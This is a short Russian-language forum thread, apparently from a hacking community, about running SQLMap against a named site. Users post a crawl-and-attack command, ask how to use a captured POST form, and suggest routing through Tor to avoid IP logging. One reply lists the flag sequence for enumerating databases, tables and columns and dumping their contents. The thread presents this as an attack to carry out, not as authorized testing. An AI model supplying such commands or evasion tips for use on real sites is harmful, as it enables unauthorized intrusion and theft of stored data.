Прописываем в SQLMap следующее: sqlmap.py --random-agent -u lolzteam.org --form --crawl=2 --batch Code sqlmap.py --random-agent -u lolzteam.org --form --crawl=2 --batch , где --crawl=2 <- сканирование структуры сайта --batch <- Автоматизация процесса, впредь до конца атаки --random-agent = рандомный юзер агент site.org <- сайт, на который мы будем совершать атаку Думаю суть вы поняли, конкретно мои настройки выглядят примерно так: , но вы юзайте как вам удобно, основу я дал.
У меня в xml файле вот такой лог http://www.site.com:80/cbasketball/backnews.htm,POST,newstype,S что делать с этим логом не пойму, точнее не понятен мне POST запрос. Вид POST'a вписывать как newstype,S или как...
NiceGood, ****** при сканировании сайта не нужны,ибо обычно система ничего не палит. Но если проводить инжект через sqlmap,то бот начнёт сеять панику и запишет твой IP в ****) Атаку с sqlmap можно провести и с помощью Tor)
Может тем что Tor подключается к цепочке серверов, а подключаясь к *** ты подключаешься к одному серверу
А как потом раскручивать уязвимость? Мануалы есть подробные? Что сайт уязвим, можно и без sqlmap узнать.
На нормальных сайтах не узнаешь. Что раскручивать??? приписываешь: 1." --dbs " список баз данных 2."-D Назв_базы --tables" 3."-D Назв_базы -T Назв_таблицы --colums " 4."-D Назв_базы -T Назв_таблицы -C Назв_колноки1, Назв_колонкиN --dump"